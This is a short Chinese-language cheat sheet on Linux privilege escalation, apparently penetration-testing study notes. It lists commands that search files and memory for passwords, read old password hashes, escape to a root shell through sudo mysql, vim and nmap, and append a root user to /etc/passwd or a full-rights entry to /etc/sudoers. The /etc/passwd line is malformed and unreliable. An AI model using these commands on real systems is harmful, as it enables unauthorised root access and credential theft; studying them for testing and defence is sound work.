内网的Linux提权基础

内网的Linux提权基础"/>

内网的Linux提权基础

Linux 提权

目的 user -> root

提权手法

密码相关

• 查看带有密码的文件

  grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null

• 查看过期密码

  权限要求比较高

  cat /etc/security/opasswd

• 用户最后编辑的文件

  find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

• 查看内存中密码

  同样要求高权限

  strings /dev/mem -n10 |grep -i pass

• 查看敏感文件

  locate password | more

计划任务

• 查看计划任务

  cat /var/log/cronlog

• 编辑计划任务

  /etc/crontab

内核漏洞

• 查看版本

• exp

  Linux_Exploit_Suggester-master

• 思路

  一般是找到一个c文件然后直接执行得到权限

sudo提权

• sudo -l 查看当前权限

第一个 ALL 指示允许从任何终端、机器访问sudo

第二个 (ALL)指示sudo命令被允许以任何用户身份执行

第三个 ALL 表示所有命令都可以作为root执行

• 如果只显示一个mysql的话，使用

  sudo mysql -e '\! /bin/sh'

  来获取一个shell

suid提权

• 查看文件

  find / -user root -perm -4000 -print 2>/dev/null

• 常见程序

  • nmap 2.02 ->5.21

    nmap > !sh

  • vim

    vim -c '!sh'

GTFOBins

利用可写文件

• /etc/passwd

  echo 'user:0:0::/root:/bin/bash'>>/etc/passwd

• /etc/sudoers

  echo 'user ALL=(ALL:ALL) ALL'>>/etc/sudoers

敏感组

• docker